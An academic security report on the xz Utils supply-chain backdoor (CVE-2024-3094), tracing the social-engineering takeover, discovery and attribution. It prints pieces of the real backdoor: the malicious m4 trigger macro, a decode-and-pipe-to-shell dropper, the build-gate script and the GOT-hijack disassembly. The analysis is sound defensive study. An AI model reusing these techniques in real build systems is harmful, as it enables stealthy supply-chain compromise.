The XZ backdoor (CVE-2024-3094)

Security report · printable summary

Hugo Sibony · Léa Bonet · EPITA · hugosibony.com/blog/xz-backdoor

Supply-chain backdoor in xz Utils leading to OpenSSH pre-authentication RCE

CVE
CVE-2024-3094
Target
xz Utils / liblzma → OpenSSH sshd
Affected versions
xz 5.6.0 and 5.6.1 release tarballs
Platform
x86_64 Linux distro builds using gcc/GNU ld
Severity
Critical
CVSS
10.0
Vulnerability class
Supply-chain compromise / backdoor
Status
Publicly disclosed; affected distros rolled back
Authors
Hugo Sibony · Léa Bonet
Institution
EPITA — École d’ingénieurs en informatique

Executive summary

A two-year maintainer-takeover operation inserted a backdoor into the xz Utils 5.6.x release tarballs, causing malicious object code to be linked into liblzma.so.5 during selected Linux distribution builds. Through downstream OpenSSH/systemd linkage, the library could be loaded into sshd, where an IFUNC resolver ran before RELRO locked the GOT and rewrote RSA_public_decrypt. A specially crafted SSH certificate signed by the attacker’s private Ed448 key could then trigger command execution before authentication, yielding remote code execution in the root-owned SSH daemon. The attack was detected before reaching stable distributions because Andres Freund investigated a roughly 500 ms SSH login latency anomaly on Debian sid.

ConfidentialityCritical

Attacker-controlled code in root-owned sshd.

IntegrityCritical

Arbitrary command execution before authentication.

AvailabilityHigh

Service compromise, persistence, or process disruption.

  1. Arrivalmaintainer takeover and trust accumulation
  2. Triggertarball-only autoconf macro execution
  3. Payloadmulti-stage extraction and build gates
  4. HijackIFUNC-time GOT rewrite inside sshd
  5. Discoverylatency anomaly, tracing, rollback

On March 29, 2024 at 15:51 UTC, Andres Freund posted a short message to oss-security: backdoor in upstream xz/liblzma leading to ssh server compromise. Within hours, Debian rolled sid back, Red Hat pulled Fedora 40 Beta and Rawhide, GitHub disabled the upstream tukaani-project organization, and CVE-2024-3094CVECommon Vulnerabilities and ExposuresPublic catalog of disclosed security vulnerabilities. Each entry receives a unique CVE-YYYY-NNNN identifier. click for the full reference received a CVSSCVSSCommon Vulnerability Scoring SystemStandard 0.0–10.0 severity score for vulnerabilities, computed from a vector string of well-defined metrics. Current spec is v4.0. click for the full reference 10.0.

What almost shipped was pre-authentication remote code execution in sshdsshdOpenSSH server daemon. Runs as root; accepts SSH connections and performs authentication. click for the full reference . The backdoor was not in OpenSSH itself. It was hidden in liblzmaliblzmaCompression library shipped by xz utils. Provides LZMA / XZ encode and decode. click for the full reference , pulled into sshd only through downstream distribution patches and transitive dependencies.

Act I - Arrival

Jia Tan’s first xz commit landed in October 2021. Through 2022, sock-puppet accounts pressured maintainer Lasse Collin about review speed and release cadence. By November 2022, Jia Tan was listed as co-maintainer. By January 2023, he was signing releases.

The quiet takeover then moved outside ordinary code review. Four changes mattered:

Russ Cox’s xz-timeline has the dated primary sources for everything above.

I

Infiltration

Oct 2021 - Jan 2024
JiaT75preparatory

First public commit by Jia Tan

PR to libarchive that subtly weakens input sanitization (replaces safe_fprintf with fprintf). Merged.

source
Jigar Kumarpressure

First pressure email to xz-devel

Sock-puppet email complaining that Jia Tan's patch isn't being merged.

Patches spend years on this mailing list. There is no reason to think anything is coming soon.
source
Lasse Collincontext

Lasse mentions Jia Tan as future co-maintainer

Reply on xz-devel hinting Jia Tan might have a bigger role in the future.

Jia Tan has helped me off-list with XZ Utils and he might have a bigger role in the future at least with XZ Utils.
source
Lasse Collincontext

Lasse pushes back on the pressure

Discloses ongoing burnout and longterm mental-health struggles, hinting Jia Tan will likely take a bigger role.

I haven't lost interest but my ability to care has been fairly limited mostly due to longterm mental health issues but also due to some other things.
source
Jigar Kumarpressure

Second pressure email

Demands new maintainer; suggests delays are unacceptable.

With your current rate, I very doubt to see 5.4.0 release this year. The only progress since april has been small changes to test code.
source
Lasse Collinpreparatory

Jia Tan listed as co-maintainer

README.md updated to list both Lasse and Jia Tan as project maintainers.

source
Jia Tanpreparatory

Jia Tan takes over releases

v5.4.1 ships - the final release Lasse signs. Subsequent releases are signed by Jia Tan.

source
Jia Tanpreparatory

Adds himself as oss-fuzz primary contact

PR #9960 to google/oss-fuzz replaces the primary security contact for xz from lasse.collin@tukaani.org with jiat0218@gmail.com. Approved by Lasse and merged. From this point on, oss-fuzz vulnerability reports route to Jia Tan.

source
Jia Tanpreparatory

PR to disable IFUNC fuzzing in oss-fuzz

Jia Tan asks Google's oss-fuzz to disable IFUNC checks - a detail that only reads as suspicious in retrospect.

source
Jia Tanpreparatory

Breaks the Landlock sandbox feature-test

Commit titled 'Fix Linux Landlock feature test' rewrites the CMakeLists feature-check as a multi-line C-source compile probe - and slips a stray '.' on its own line into the source, which makes the probe never compile. HAVE_LINUX_LANDLOCK is silently never defined; the runtime sandbox is silently disabled. Lands between 5.6.0 (Feb 24) and 5.6.1 (Mar 9), so it ships in 5.6.1.

source
II

Release

Feb - Mar 2024
Jia Tanmalicious

Malicious test files committed

Adds tests/files/bad-3-corrupt_lzma2.xz and good-large_compressed.lzma - disguised as test corpus, actually contain the obfuscated payload.

source
Jia Tanmalicious

xz-utils 5.6.0 released

Tarball ships with a modified m4/build-to-host.m4 that triggers the payload during ./configure. The modification exists only in the tarball, not in git.

source
Jia Tanmalicious

xz-utils 5.6.1 released

Updated payload - fixes Valgrind errors that were tipping off Debian's autopkgtest. The hurried fix is itself a tell.

source
Jia Tanmalicious

Updates SECURITY.md to prefer private email reports

Four days before discovery, Jia Tan changes xz's SECURITY.md to prefer reports sent over private email rather than via GitHub security advisories. Combined with the oss-fuzz contact change, vulnerability reports were now expected to flow privately to Jia Tan first - bypassing the wider community.

source
III

Discovery

Mar 29, 2024
Andres Freundanomaly

Symptoms with sshd on Debian sid

Andres Freund notices, on a Debian sid box, valgrind errors and a ~0.5 s extra CPU on ssh logins (clean: 0m0.299s; backdoored: 0m0.807s). His own framing in the disclosure is "odd symptoms around liblzma … over the last weeks" - the exact start date is not in the public record.

source
Andres Freundtrace

Tracing the divergence

Per the disclosure, Andres uses perf record -e intel_pt//ub to find where execution in the slow sshd diverges from a clean baseline, then attaches gdb with breakpoints before the divergence. The trail leads into liblzma's CRC64 path - which sshd has no upstream reason to call.

source
Andres Freunddisclosure

Public disclosure on oss-security

source
Distros · GitHubresponse

Distros roll back, GitHub disables the org

Within hours: Debian rolls sid back to 5.4.5-0.2; Red Hat issues an urgent advisory pulling Fedora 40 Beta and Rawhide; Homebrew downgrades xz on macOS. GitHub disables the tukaani-project organization. CVE-2024-3094 is assigned the same day, scored 10.0.

source

Act II - The Trigger

By February 2024, Jia Tan signs releases and controls the security inbox. The hostile code lands next — not in git, but in the release tarball.

An xz release has two relevant artifacts: the git tag auditors inspect, and the release tarball distributions build. They should match. They did not.

The tarball contains generated autoconf files — ./configure and expanded .m4 macros. Almost nobody reviews that output line by line. xz 5.6.1 used that blind spot: its tarball included an m4/build-to-host.m4 absent from git, disguised as a normal gnulib macro.

git tree (5.6.1 tag)

  • m4/
  • m4/.gitignore
  • m4/getopt.m4
  • m4/posix-shell.m4
  • tuklib_*.m4 (×7)

released tarball (xz-5.6.1.tar.gz)

  • m4/
  • m4/build-to-host.m4 ← injector
  • m4/getopt.m4
  • m4/gettext.m4
  • m4/host-cpu-c-abi.m4
  • m4/posix-shell.m4
  • tuklib_*.m4 (×7)
  • intl*.m4 (×8)
m4/build-to-host.m4 ships only in the tarball, not in the git tree.

The name is legitimate; the content is not. Compared with upstream gnulib, three additions carry the trigger:

m4/build-to-host.m4 - upstream gnulib vs xz-5.6.1.tar.gz
# build-to-host.m4
dnl Written by Bruno Haible.
AC_DEFUN([gl_BUILD_TO_HOST],
[
...
gl_final_[$1]="$[$1]"
gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
...
if test "x$gl_am_configmake" != "x"; then
gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
fi
AC_CONFIG_COMMANDS([build-to-host],
[eval $gl_config_gt | $SHELL 2>/dev/null],
[gl_config_gt="eval \$gl_[$1]_config"])
])
AC_DEFUN([gl_BUILD_TO_HOST_INIT],
[
gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
gl_sed_double_backslashes='s/\\/\\\\/g'
gl_sed_escape_doublequotes='s/"/\\"/g'
gl_path_map='tr "\t \-_" " \t_\-"'
])

After autoconf evaluates the macro, the m4 variables resolve into concrete shell:

This is the central trick: the trigger lives only in the tarball. It exploits the gap between the repository people review and the generated artifact distributions actually build.

Act III - The Payload

The dropper is built to be boring at every layer: harmless-looking pieces, no obvious ELFELFExecutable and Linkable FormatThe standard binary format for executables, shared libraries, and object files on Linux and most Unixes. click for the full reference payload on disk, and silent exits outside distro builds. The m4 trigger plus two compressed test fixtures unfold into one object file: liblzma_la-crc64-fast.o.

Stage 1 - the shell script that comes out

The m4-flow above produces a 1.3 KB shell script - Stage-1. It doesn’t do anything dangerous itself; its only job is to extract the next layer from the other test fixture, good-large_compressed.lzma.

Stage 2 - the chunker

Stage-1 runs this pipeline:

Stage-1.sh - extracting the payload from good-large_compressed.lzma
xz -dc good-large_compressed.lzma \
| <head-chunker> \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" \
| xz -F raw --lzma1 -dc \
| /bin/sh

The <head-chunker> repeatedly skips 1024 bytes and takes selected chunks from the middle of the file. The following tr table permutes all 256 byte values. The byte counts tell the story:

The 5.6.0 dropper uses different magic numbers (tail -c +31265, head -c +724, a different tr table) - same shape, version-specific constants.

Stage 3 - the gates

Before that second pass extracts the ELF, Stage-2 gates aggressively. Each check below is “if this looks wrong, exit silently - no error, no message, no trace”:

Stage-2.sh - the build-environment gate (condensed)
[ "$(uname)" != "Linux" ] && exit 0 # not Linux
echo "$build" | grep -Eq "^x86_64.*linux-gnu$" || exit 0 # not x86_64 Linux ABI
[ "$CC" = "gcc" ] && [ "$GCC" = "yes" ] || exit 0 # not gcc
$LD -v 2>&1 | grep -q "GNU ld" || exit 0 # not GNU ld
[ "$enable_shared" = "yes" ] || exit 0 # not building a shared library
test -f "$srcdir/debian/rules" || [ "$RPM_ARCH" = "x86_64" ] || exit 0 # not a Debian or x86_64 RPM build
grep -q 'HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h || exit 0 # IFUNC support not detected

The dropper fires only inside a real x86_64 Linux distro packaging job. Anything else - CI sandboxes, fuzzers, builds outside Debian or RPM packaging - exits silently. Documented in Sam James’s canonical FAQ.

What landed

The extracted object is small — 88,664 bytes — but deliberately noisy. It has 242 section headers, because Stage-2 compiles it with -ffunction-sections -fdata-sections. Every function and data object gets its own section, burying the malicious symbols in a long, plausible list.

The important symbols, per smx-smx/xzre, are:

  • _get_cpuid — the IFUNC entry point.
  • _cpuid — a CPUID helper used as camouflage.
  • .Lx86_code.part.0 — an opaque ~2.7 KB blob holding the runtime payload.

Once linked into liblzma.so.5, the object becomes part of a signed, hash-verified Debian or Fedora package. The package checks pass, because they verify the binary as built — and the binary as built contains the backdoor.

Act IV - The Hijack

The runtime attack needs two conditions: liblzma loaded inside sshd, and a writable function pointer before startup hardening finishes.

The path

Upstream OpenSSH doesn’t link libsystemdlibsystemdsystemd client library. Provides the C API for talking to systemd from userspace. click for the full reference . The chain that brings liblzma into sshd is built from two patches no single auditor watches end-to-end:

ldd /usr/sbin/sshd · Debian sid (excerpt)
libcrypto.so.3 => /lib/x86_64-linux-gnu/libcrypto.so.3
libsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 # via downstream sd_notify patch
liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 # transitive - pulled by libsystemd

A loaded library shares its host process. Once liblzma.so.5 is mapped into sshd, it can touch sshd memory, including GOT entries and function pointers. Since sshd runs as root, code execution there is remote root. The setup happens before any client connects, during ld.sold.soThe Linux dynamic linker / loader. Maps shared libraries into a process at startup, resolves symbol references, runs IFUNC resolvers, and applies RELRO before jumping to the program's entry point. click for the full reference startup.

IFUNC, before RELRO

An IFUNCIFUNCIndirect FunctionGCC attribute that lets a symbol pick its implementation at startup via a resolver function - used for CPU-feature-aware dispatch. click for the full reference symbol is resolved by running a small resolver during process startup. xz already used this for CRC64, choosing between a fast CPU-specific implementation and a fallback. The backdoor hides inside that existing dispatch path; it does not add a suspicious new mechanism.

The timing is the bug-shaped gap: IFUNC resolvers run before RELRORELRORelocation Read-OnlyLinker hardening that mprotects the GOT read-only after symbol resolution finishes, so nothing can rewrite those addresses later. click for the full reference makes the GOT read-only. During that window, a resolver can rewrite GOT entries. Full RELRO still arrives — just too late.

The resolver - installing the hook

The installer is split across two lookalike functions:

  • _get_cpuid — the legitimate-looking IFUNC resolver glibc calls during startup.
  • _get_cpuia — the hidden helper it calls as a side effect; this one installs the hook.

That split is the camouflage. _get_cpuid still returns valid CPUID data, so startup continues normally. The suspicious part is one callq callq Call subroutine Push return address, then jump to the target. click to open the full reference at offset 0x27. In the disassembly it appears to call the next instruction, still inside _get_cpuid; that is misleading because this is an unlinked object and the call target is still a relocation placeholder.

Unlinked object · _get_cpuid contains a relocation-backed call
0000000000000000 <_get_cpuid>:
0: f3 0f 1e fa endbr64
4: 55 pushq %rbp
5: 48 89 f5 movq %rsi, %rbp
8: 4c 89 ce movq %r9, %rsi
b: 53 pushq %rbx
c: 89 fb movl %edi, %ebx
e: 81 e7 00 00 00 80 andl $0x80000000, %edi
14: 48 83 ec 28 subq $0x28, %rsp
18: 48 89 54 24 18 movq %rdx, 0x18(%rsp)
1d: 48 89 4c 24 10 movq %rcx, 0x10(%rsp)
22: 4c 89 44 24 08 movq %r8, 0x8(%rsp)
27: e8 00 00 00 00 callq 0x2c <_get_cpuid+0x2c>
2c: 85 c0 testl %eax, %eax
2e: 74 27 je 0x57 <_get_cpuid+0x57>

The relocation reveals the real target:

0000000000000028: R_X86_64_PC32 .text._get_cpuia-0x4

After linking, the call jumps to _get_cpuia — a deliberate typo sitting next to _get_cpuid in the symbol table. Its job is simple:

The important point is the data path, not the basic blocks: walk _r_debug_r_debugWell-known global the dynamic linker exposes; head of a doubly-linked list of `link_map` entries (one per loaded shared object). click for the full reference , find sshd’s link_maplink_mapPer-shared-object struct the dynamic linker uses to track load address, file name, dynamic-section pointer, and links to neighboring loaded objects. click for the full reference , parse its .dynsym.dynsymELF section holding the dynamic symbol table - the symbols visible at runtime to other modules and the dynamic linker. click for the full reference , locate RSA_public_decryptRSA_public_decryptOpenSSL function that takes a signature, decrypts it with a public key, and returns the recovered plaintext. Used to verify RSA signatures. click for the full reference , and overwrite that GOT slot. By the time _get_cpuid returns to glibc, the pointer is already poisoned; RELRO then freezes it.

The hook - at request time

The runtime payload avoids obvious strings: names such as RSA_public_decrypt are resolved indirectly during the link_map walk. A simple string scan of the object is therefore unhelpful.

By the time sshd reaches main(), one GOT entry has changed. RSA_public_decrypt no longer points to libcrypto; it points to a stub inside liblzma. Everything else is left alone:

At request time, the hook waits for certificate authentication. OpenSSH thinks it is verifying an RSA value. The stub interprets the same bytes as a small command frame:

The gate

The signature scheme is Ed448Ed448EdDSA over edwards448Edwards-curve digital signature scheme on the untwisted Edwards curve edwards448 over $\mathbb{F}_p$ with $p = 2^{448} - 2^{224} - 1$. Targets ~224-bit security. click for the full reference , not Ed25519 - EdDSA over Curve448, ~224-bit classical security. amlweems/xzbot confirmed it with a working proof-of-concept, extracted the embedded public key, and shipped a honeypot patch for OpenSSH. Without the matching private key, even a connection that knows the modulus layout produces no system call. The gate kept blast radius to whoever held that key - and stopped opportunistic abuse the moment the binary shipped.

Act V - The Discovery

What caught the backdoor was a half-second of CPU on every ssh login. A clean sshd -h took 0m0.299s; the same call against a backdoored liblzma took 0m0.807s.

The tools Andres Freund named in his disclosure:

  • valgrind - memory-error detector. Caught the bad reads and writes.
  • perf record -e intel_pt//ub - Intel Processor Trace, recording every instruction. Pinpointed where the slow run diverged from a clean baseline.
  • gdb - breakpoints just before that divergence.

The trail led into liblzma’s CRC64 path - a function sshd has no upstream reason to call - and into the redirected RSA_public_decrypt. He posted the disclosure to oss-security:

After observing a few odd symptoms around liblzma (part of the xz package) on Debian sid installations over the last weeks (logins with ssh taking a lot of CPU, valgrind errors) I figured out the answer: The upstream xz repository and the xz tarballs have been backdoored. - Andres Freund, oss-security 2024/03/29/4 ↗

0ms 250ms 500ms 750ms 1000ms clean (pre-5.6) 299ms backdoored (5.6.x) 807ms
sshd connection time, clean vs backdoored.

Aftermath

Within seven days of Andres’s email, every affected distribution shipped a rollback: Debian rolled sid back to a pre-5.6 xz; Red Hat pulled Fedora 40 Beta and Rawhide; openSUSE, Arch, and Kali pulled or downgraded; Homebrew downgraded xz on macOS as a precaution. GitHub disabled the tukaani-project organization for several days, then re-enabled it under Lasse Collin’s sole control. Lasse published a maintainer’s statement at tukaani.org/xz-backdoor.

Shipped & exploitable 5
  1. Debian sid 5.6.0 / 5.6.1

    Rolled back to 5.4.5-0.2 on 2024-03-29.

  2. Fedora 40 Beta 5.6.0 / 5.6.1

    Red Hat issued urgent advisory.

  3. Fedora Rawhide 5.6.x
  4. openSUSE Tumbleweed 5.6.1
  5. Kali rolling 5.6.0 (briefly)

    Pulled within hours.

Shipped but inert 2
  1. Arch Linux 5.6.0 / 5.6.1

    Arch's openssh does not link libsystemd by default - backdoor present but path to sshd missing.

  2. Alpine edge 5.6.x

    musl, not glibc - wrong ABI for the IFUNC trick.

Never shipped 4
  1. Debian stable 5.4.x only

    Stable never received the malicious release.

  2. Ubuntu LTS 5.4.x only

    All LTS lines safe.

  3. RHEL ≤5.2.4

    Stable Red Hat never shipped 5.6.

  4. Amazon Linux ≤5.2.5

The vulnerable releases reached rolling and pre-release distributions only. Stable lines - Debian stable, Ubuntu LTS, RHEL, Amazon Linux - were still on pre-5.6 versions and were never exposed.

What this attack proved

01

Startup code can beat hardening

IFUNC resolvers run before RELRO makes the GOT read-only. A library loaded into sshd can rewrite function pointers during that window.

02

Maintainer trust is attack surface

Two years of contributions, pressure emails, and role expansion were enough to put hostile bytes into a library every distro ships.

03

The only alarm was latency

No fuzzer, SBOM check, or reproducible-build audit caught it. A developer noticed sshd was slow and followed the anomaly.

Attribution - who was Jia Tan?

What Jia Tan did is on the record. Who Jia Tan was - real name, real geography, employer - is not public and may never be. The most rigorous open analysis to date is Rhea Karty (Dartmouth) and Simon Henniger (TU Munich), published April 2024.

Timezone - claimed vs actual

Almost every Jia Tan commit is timestamped UTC+8 - Chinese Standard Time. A handful are stamped UTC+2 or UTC+3 - Eastern European Time and its summer variant. Forgetting to set a fake timezone before commit is a one-way error: someone really in UTC+8 will not accidentally produce UTC+3 timestamps. Someone in EET who forgot to fake the timezone will.

The slipups Karty and Henniger logged are concrete:

  • 2022-10-06: two commits ~11 hours apart, one stamped +0300, the other +0800.
  • 2023-06-27: two commits minutes apart, one stamped +0300, the other +0800.
  • Total: 3 commits stamped UTC+02, 6 stamped UTC+03, all the rest UTC+08.

Work hours and weekdays

Jia Tan’s commit hours, adjusted from the spoofed +0800 to actual +0200/+0300, cluster between 09:00 and 18:00 - a regular office workday in Eastern European Time. Across all 452 commits Jia Tan landed on tukaani-project/xz between January 2022 and March 2024, the day-of-week distribution is distinctly weekday-shaped:

The shape reads as someone working a regular office job - not as someone moonlighting on a covert project after hours.

Chinese holidays

If Jia Tan were actually in mainland China, two periods in 2023 should show activity gaps: the Lunar New Year (January 22–27) and the Mid-Autumn Festival (September 29). Neither does. Jia Tan committed normally through both. Specific examples, verifiable on GitHub:

  • 2023-01-24, 12:48 UTC - liblzma: Fix documentation in filter.h for lzma_str_to_filters() - f35d98e2
  • 2023-01-27, 12:14 UTC - Translations: Add Brazilian Portuguese translation of man pages - 3b1c8ac8
  • 2023-09-29, 11:58 UTC - CMake: Specify LINKER_LANGUAGE for libgnu target - 506d0312
  • 2023-09-29, 14:11 UTC - CI: Disable CLANG64 MSYS2 environment until bug is resolved - 01e34aa1

Three commits on the Mid-Autumn Festival itself; routine maintenance work spread across the Lunar New Year week. Not the cadence of someone observing the holidays.

Sock-puppet coordination

The pressure emails came from accounts (Jigar Kumar, Dennis Ens) with zero public footprint anywhere else online. Their timing aligned with what Jia Tan needed at each step. Whether one operator using two emails or two coordinated operators isn’t known from the public record. Either way, almost certainly the same operation.

What we don’t know

Patience (≥2 years), budget to keep an identity active that long, and the sophistication of the runtime payload all point to a state-aligned actor - not a freelancer, not a criminal group. Public attribution remains speculative: no government has named a suspect; no suspect has been arrested. Treat any specific naming you see online as unverified.

Notes & sources

Every claim above is sourced to the references below. They’re listed in roughly the order you’d want to read them to follow the attack end-to-end.

Disclosure & timeline

  • Andres Freund - oss-security disclosure (2024-03-29) - the original public disclosure. Quoted verbatim in Act V; the body of the email is the source for the timing measurements and the tools Andres used to chase the symptoms.
  • Russ Cox - Timeline of the xz attack - dated, conservative reconstruction of the social-engineering campaign with primary-source citations for every event. Act I’s Timeline component is built from this.
  • Sam James - canonical FAQ - community-maintained FAQ kept current as findings landed. Source for the build-environment gate (x86_64 Linux, gcc, GNU ld, Debian/RPM packaging context) and the dependency chain through libsystemd.

The dropper (Acts II–III)

  • Russ Cox - The xz attack shell script - byte-level walk through m4/build-to-host.m4, the two test fixtures, and the multi-stage dropper. Acts II and III are cross-checked against this throughout.

The runtime payload (Act IV)

  • smx-smx/xzre - runtime reverse-engineering of the malicious .o. Source for the symbol names (_get_cpuid, _cpuid, .Lx86_code.part.0), the GOT-rewrite mechanism, and the binary itself (downloadable from the repo root).
  • amlweems/xzbot - working proof-of-concept. Extracts the Ed448 public key, documents the modulus-as-frame layout (tag · signature · command), and ships a honeypot patch for OpenSSH.
  • Binarly - XZ backdoor analysis - independent extraction of the .o from a real distro .deb. Different sha-256 from xzre’s copy, identical structure - useful for cross-verification.
  • Gynvael Coldwind - deep dive - second-source corroboration of the runtime-payload analysis, with a different reverser’s lens on the same artifact.

Maintainer & community response

Attribution sources